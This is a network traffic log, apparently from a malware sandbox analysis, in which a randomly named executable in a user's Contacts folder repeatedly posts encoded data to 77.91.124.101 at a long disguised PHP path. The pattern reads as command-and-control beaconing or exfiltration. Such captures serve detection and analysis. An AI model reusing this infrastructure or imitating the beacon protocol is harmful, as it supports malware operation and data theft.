                                                            Data Ascii: WYX]^YZ]]WUWU_WWPSXFVPWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X*8=+"=Z/27)9+U)3.&0&,+9<,+Y,&G''^)#
                                                            Nov 21, 2023 04:47:57.475258112 CET351INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:57 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4677.91.124.10180192.168.2.549760C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:57.801287889 CET352OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:57.998136044 CET352INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:57.998382092 CET355OUTData Raw: 52 5a 5d 5c 5e 5d 5a 5a 5d 57 55 57 55 59 57 50 50 5f 58 49 56 51 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ]\^]ZZ]WUWUYWPP_XIVQWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^)(81);$97)_?3-'-1&#>V.8*X<Z;->&G''^)
                                                            Nov 21, 2023 04:47:58.201750040 CET355INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:57 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            46192.168.2.54976077.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:57.801287889 CET352OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:57.998136044 CET352INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:57.998382092 CET355OUTData Raw: 52 5a 5d 5c 5e 5d 5a 5a 5d 57 55 57 55 59 57 50 50 5f 58 49 56 51 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ]\^]ZZ]WUWUYWPP_XIVQWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^)(81);$97)_?3-'-1&#>V.8*X<Z;->&G''^)
                                                            Nov 21, 2023 04:47:58.201750040 CET355INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:57 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            47192.168.2.54976177.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:58.522582054 CET356OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:58.720407963 CET356INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:58.720709085 CET359OUTData Raw: 52 5a 58 5e 5e 59 5a 5e 5d 57 55 57 55 5c 57 5b 50 5c 58 42 56 54 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZX^^YZ^]WUWU\W[P\XBVTWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8%_?8%?37]/]49*) 90>2Q39-(:^(<<8>&G''^)/
                                                            Nov 21, 2023 04:47:58.925018072 CET359INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:58 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4777.91.124.10180192.168.2.549761C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:58.522582054 CET356OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:58.720407963 CET356INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:58.720709085 CET359OUTData Raw: 52 5a 58 5e 5e 59 5a 5e 5d 57 55 57 55 5c 57 5b 50 5c 58 42 56 54 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZX^^YZ^]WUWU\W[P\XBVTWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8%_?8%?37]/]49*) 90>2Q39-(:^(<<8>&G''^)/
                                                            Nov 21, 2023 04:47:58.925018072 CET359INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:58 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            48192.168.2.54976277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:59.236670971 CET360OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:59.434784889 CET360INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:59.434998035 CET363OUTData Raw: 52 5d 58 5a 5b 53 5a 5e 5d 57 55 57 55 5f 57 55 50 5a 58 42 56 57 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]XZ[SZ^]WUWU_WUPZXBVWW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*_<1>07[89 &+3V0133>9;]</48&G''^)#
                                                            Nov 21, 2023 04:47:59.637718916 CET363INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:59 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4877.91.124.10180192.168.2.549762C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:59.236670971 CET360OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:59.434784889 CET360INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:59.434998035 CET363OUTData Raw: 52 5d 58 5a 5b 53 5a 5e 5d 57 55 57 55 5f 57 55 50 5a 58 42 56 57 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]XZ[SZ^]WUWU_WUPZXBVWW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*_<1>07[89 &+3V0133>9;]</48&G''^)#
                                                            Nov 21, 2023 04:47:59.637718916 CET363INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:59 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4977.91.124.10180192.168.2.549763C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:59.960717916 CET364OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:00.159409046 CET364INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:00.338649988 CET365INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:00 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 0
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            49192.168.2.54976377.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:59.960717916 CET364OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:00.159409046 CET364INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:00.338649988 CET365INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:00 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 0
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5192.168.2.54971777.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:29.580786943 CET162OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:29.778557062 CET163INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:29.778968096 CET165OUTData Raw: 52 5c 5d 5d 5b 59 5f 5e 5d 57 55 57 55 5c 57 57 50 5d 58 49 56 50 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\]][Y_^]WUWU\WWP]XIVPWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>=((%= ;Z,4[75])0%0=2031.8>>,7,&G''^)/
                                                            Nov 21, 2023 04:47:29.983077049 CET165INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:29 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            577.91.124.10180192.168.2.549717C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:29.580786943 CET162OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:29.778557062 CET163INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:29.778968096 CET165OUTData Raw: 52 5c 5d 5d 5b 59 5f 5e 5d 57 55 57 55 5c 57 57 50 5d 58 49 56 50 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\]][Y_^]WUWU\WWP]XIVPWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>=((%= ;Z,4[75])0%0=2031.8>>,7,&G''^)/
                                                            Nov 21, 2023 04:47:29.983077049 CET165INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:29 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5077.91.124.10180192.168.2.549764C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:00.333837032 CET365OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:00.531379938 CET366INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:00.531569958 CET367OUTData Raw: 52 5d 58 5c 5b 53 5f 5b 5d 57 55 57 55 58 57 5a 50 52 58 45 56 50 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]X\[S_[]WUWUXWZPRXEVPW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'])+5X<;=U$,$^#1?>P0&W'0-]:<,/&G''^)?
                                                            Nov 21, 2023 04:48:00.733994961 CET371INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:00 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 02 27 3f 38 10 21 33 34 0b 2b 3a 2d 50 2e 3d 3e 43 3f 0a 21 13 25 2e 28 5e 27 07 04 0d 3c 3f 02 5d 27 29 0d 0e 21 26 2b 00 29 30 21 5a 0c 1d 26 5e 36 3b 3b 57 3c 2e 3f 02 29 3d 2c 5b 31 32 24 06 3f 3d 3f 50 34 23 3b 5b 24 30 20 1b 2c 59 29 59 2e 16 0c 09 27 2c 0b 07 22 2d 23 5f 0c 14 24 0c 22 31 27 5b 37 30 39 08 36 24 37 04 23 37 37 1c 27 2e 23 08 32 38 3e 07 3f 28 0a 55 25 51 20 50 33 2a 2f 53 32 39 23 1e 29 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !'?8!34+:-P.=>C?!%.(^'<?]')!&+)0!Z&^6;;W<.?)=,[12$?=?P4#;[$0 ,Y)Y.',"-#_$"1'[7096$7#77'.#28>?(U%Q P3*/S29#):&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            50192.168.2.54976477.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:00.333837032 CET365OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:00.531379938 CET366INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:00.531569958 CET367OUTData Raw: 52 5d 58 5c 5b 53 5f 5b 5d 57 55 57 55 58 57 5a 50 52 58 45 56 50 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]X\[S_[]WUWUXWZPRXEVPW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'])+5X<;=U$,$^#1?>P0&W'0-]:<,/&G''^)?
                                                            Nov 21, 2023 04:48:00.733994961 CET371INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:00 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 02 27 3f 38 10 21 33 34 0b 2b 3a 2d 50 2e 3d 3e 43 3f 0a 21 13 25 2e 28 5e 27 07 04 0d 3c 3f 02 5d 27 29 0d 0e 21 26 2b 00 29 30 21 5a 0c 1d 26 5e 36 3b 3b 57 3c 2e 3f 02 29 3d 2c 5b 31 32 24 06 3f 3d 3f 50 34 23 3b 5b 24 30 20 1b 2c 59 29 59 2e 16 0c 09 27 2c 0b 07 22 2d 23 5f 0c 14 24 0c 22 31 27 5b 37 30 39 08 36 24 37 04 23 37 37 1c 27 2e 23 08 32 38 3e 07 3f 28 0a 55 25 51 20 50 33 2a 2f 53 32 39 23 1e 29 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !'?8!34+:-P.=>C?!%.(^'<?]')!&+)0!Z&^6;;W<.?)=,[12$?=?P4#;[$0 ,Y)Y.',"-#_$"1'[7096$7#77'.#28>?(U%Q P3*/S29#):&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5177.91.124.10180192.168.2.549765C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:00.456012964 CET366OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:00.658432961 CET368INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:00.658720016 CET370OUTData Raw: 57 5f 58 58 5b 5e 5a 50 5d 57 55 57 55 5c 57 50 50 5b 58 43 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_XX[^ZP]WUWU\WPP[XCVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8<+==U<;7%#:5\<3=%$!.;?/Y8&G''^)/
                                                            Nov 21, 2023 04:48:00.863715887 CET371INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:00 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
